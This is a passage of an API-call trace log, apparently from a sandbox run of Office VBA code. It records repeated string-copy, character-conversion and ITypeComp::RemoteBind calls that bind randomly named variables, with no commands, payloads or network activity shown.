ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mAUBGA4") returned 0x10ccd0 [0069.891] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="mAUBGA4" | out: _Dst="mAUBGA4") returned 0x0 [0069.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="mAUBGA4") returned 8 [0069.891] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mAUBGA4", lHashVal=0x10ccd0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.891] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.891] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b828ea | out: _Dst=0x68767a0) returned 0x0 [0069.891] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_mAUBGA4" | out: _Dst="_B_var_mAUBGA4") returned 0x0 [0069.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_mAUBGA4") returned 15 [0069.891] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mAUBGA4", lHashVal=0x10c0d3, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x47004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x47004200000000, pDummy=0x0) returned 0x0 [0069.892] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b828ea | out: _Dst=0x144ec0) returned 0x0 [0069.892] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mQAXA_", lHashVal=0x100031, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82912, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mQAXA_") returned 7 [0069.892] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mQAXA_", lHashVal=0x100031, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82912, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mQAXA_") returned 7 [0069.892] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mQAXA_", lHashVal=0x100031, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mQAXA_") returned 0x100031 [0069.892] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="mQAXA_" | out: _Dst="mQAXA_") returned 0x0 [0069.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="mQAXA_") returned 7 [0069.892] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mQAXA_", lHashVal=0x100031, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.892] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.892] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82912 | out: _Dst=0x68767a0) returned 0x0 [0069.892] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_mQAXA_" | out: _Dst="_B_var_mQAXA_") returned 0x0 [0069.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_mQAXA_") returned 14 [0069.892] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mQAXA_", lHashVal=0x107ada, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0) returned 0x0 [0069.892] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82912 | out: _Dst=0x144ec0) returned 0x0 [0069.892] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x68767a0) returned 0x0 [0069.893] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.893] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.893] ITypeComp:RemoteBind (in: This=0x665ba60, szName="axxUDCcZ", lHashVal=0x10e4a9, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8286a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="axxUDCcZ") returned 9 [0069.893] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="axxUDCcZ", lHashVal=0x10e4a9, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8286a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="axxUDCcZ") returned 9 [0069.893] ITypeComp:RemoteBind (in: This=0x665bd30, szName="axxUDCcZ", lHashVal=0x10e4a9, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="axxUDCcZ") returned 0x10e4a9 [0069.893] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="axxUDCcZ" | out: _Dst="axxUDCcZ") returned 0x0 [0069.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="axxUDCcZ") returned 9 [0069.893] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="axxUDCcZ", lHashVal=0x10e4a9, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.893] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.893] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b8286a | out: _Dst=0x68767a0) returned 0x0 [0069.893] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_axxUDCcZ" | out: _Dst="_B_var_axxUDCcZ") returned 0x0 [0069.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_axxUDCcZ") returned 16 [0069.893] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_axxUDCcZ", lHashVal=0x10bc32, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x44005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x44005500000000, pDummy=0x0) returned 0x0 [0069.894] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8286a | out: _Dst=0x144ec0) returned 0x0 [0069.894] ITypeComp:RemoteBind (in: This=0x665ba60, szName="IDGAQZAQ", lHashVal=0x109aa4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82962, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="IDGAQZAQ") returned 9 [0069.894] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="IDGAQZAQ", lHashVal=0x109aa4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82962, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="IDGAQZAQ") returned 9 [0069.894] ITypeComp:RemoteBind (in: This=0x665bd30, szName="IDGAQZAQ", lHashVal=0x109aa4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.894] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IDGAQZAQ") returned 0x109aa4 [0069.894] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="IDGAQZAQ" | out: _Dst="IDGAQZAQ") returned 0x0 [0069.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="IDGAQZAQ") returned 9 [0069.894] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="IDGAQZAQ", lHashVal=0x109aa4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.894] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.894] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82962 | out: _Dst=0x68767a0) returned 0x0 [0069.894] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_IDGAQZAQ" | out: _Dst="_B_var_IDGAQZAQ") returned 0x0 [0069.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_IDGAQZAQ") returned 16 [0069.894] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_IDGAQZAQ", lHashVal=0x10722d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0) returned 0x0 [0069.894] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82962 | out: _Dst=0x144ec0) returned 0x0 [0069.894] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fB1DAA", lHashVal=0x100efc, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8293a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fB1DAA") returned 7 [0069.895] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fB1DAA", lHashVal=0x100efc, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8293a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fB1DAA") returned 7 [0069.895] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fB1DAA", lHashVal=0x100efc, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.895] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fB1DAA") returned 0x100efc [0069.895] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="fB1DAA" | out: _Dst="fB1DAA") returned 0x0 [0069.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="fB1DAA") returned 7 [0069.895] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fB1DAA", lHashVal=0x100efc, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.895] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.895] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b8293a | out: _Dst=0x68767a0) returned 0x0 [0069.895] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_fB1DAA" | out: _Dst="_B_var_fB1DAA") returned 0x0 [0069.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_fB1DAA") returned 14 [0069.895] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fB1DAA", lHashVal=0x1089a5, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.895] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8293a | out: _Dst=0x144ec0) returned 0x0 [0069.895] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tGAcGAx", lHashVal=0x105b7b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8298e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="tGAcGAx") returned 8 [0069.895] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tGAcGAx", lHashVal=0x105b7b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8298e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="tGAcGAx") returned 8 [0069.896] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tGAcGAx", lHashVal=0x105b7b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.896] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tGAcGAx") returned 0x105b7b [0069.896] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="tGAcGAx" | out: _Dst="tGAcGAx") returned 0x0 [0069.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="tGAcGAx") returned 8 [0069.896] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tGAcGAx", lHashVal=0x105b7b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.896] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.896] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b8298e | out: _Dst=0x68767a0) returned 0x0 [0069.896] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_tGAcGAx" | out: _Dst="_B_var_tGAcGAx") returned 0x0 [0069.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_tGAcGAx") returned 15 [0069.896] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8298e | out: _Dst=0x144ec0) returned 0x0 [0069.896] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="iB_BABAA" | out: _Dst="iB_BABAA") returned 0x0 [0069.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="iB_BABAA") returned 9 [0069.896] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b829b6 | out: _Dst=0x68767a0) returned 0x0 [0069.896] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_iB_BABAA" | out: _Dst="_B_var_iB_BABAA") returned 0x0 [0069.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_iB_BABAA") returned 16 [0069.896] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b829b6 | out: _Dst=0x144ec0) returned 0x0 [0069.897] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="MABAD_D" | out: _Dst="MABAD_D") returned 0x0 [0069.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="MABAD_D") returned 8 [0069.897] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b829e2 | out: _Dst=0x68767a0) returned 0x0 [0069.897] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_MABAD_D" | out: _Dst="_B_var_MABAD_D") returned 0x0 [0069.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_MABAD_D") returned 15 [0069.897] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b829e2 | out: _Dst=0x144ec0) returned 0x0 [0069.897] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="GQwA_A" | out: _Dst="GQwA_A") returned 0x0 [0069.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="GQwA_A") returned 7 [0069.897] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82a32 | out: _Dst=0x68767a0) returned 0x0 [0069.897] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_GQwA_A" | out: _Dst="_B_var_GQwA_A") returned 0x0 [0069.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_GQwA_A") returned 14 [0069.897] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82a32 | out: _Dst=0x144ec0) returned 0x0 [0069.897] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="LZAGwc" | out: _Dst="LZAGwc") returned 0x0 [0069.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="LZAGwc") returned 7 [0069.897] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82a0a | out: _Dst=0x68767a0) returned 0x0 [0069.897] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_LZAGwc" | out: _Dst="_B_var_LZAGwc") returned 0x0 [0069.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_LZAGwc") returned 14 [0069.898] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82a0a | out: _Dst=0x144ec0) returned 0x0 [0069.898] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="fAUUZGC" | out: _Dst="fAUUZGC") returned 0x0 [0069.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="fAUUZGC") returned 8 [0069.898] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b82a82 | out: _Dst=0x68767a0) returned 0x0 [0069.898] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_fAUUZGC" | out: _Dst="_B_var_fAUUZGC") returned 0x0 [0069.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_fAUUZGC") returned 15 [0069.898] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82a82 | out: _Dst=0x144ec0) returned 0x0 [0069.898] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tDcUQA" | out: _Dst="tDcUQA") returned 0x0 [0069.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tDcUQA") returned 7 [0069.898] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82aaa | out: _Dst=0x68767a0) returned 0x0 [0069.898] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tDcUQA" | out: _Dst="_B_var_tDcUQA") returned 0x0 [0069.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tDcUQA") returned 14 [0069.898] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82aaa | out: _Dst=0x144ec0) returned 0x0 [0069.898] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="IQCAUAo" | out: _Dst="IQCAUAo") returned 0x0 [0069.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, 